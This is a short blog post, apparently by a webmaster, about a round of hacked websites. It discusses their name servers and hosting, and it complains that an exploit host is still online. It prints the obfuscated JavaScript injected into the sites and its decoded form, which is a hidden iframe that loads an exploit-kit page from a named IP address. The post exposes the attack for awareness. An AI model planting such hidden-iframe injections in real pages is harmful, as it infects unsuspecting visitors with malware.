The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.
All these sites have the following Whois Name Server entries:
Name Server: NS1.IPOWERDNS.COMSure looks like iPowerWeb, right?
Name Server: NS1.IPOWERWEB.NET
But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND
Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));Don't go to the link below if you know what's good for you, it's not safe.
The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Honk Kong which has a San Francisco mailbox according to their website.
Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?
I don't get it, the web has gone mad...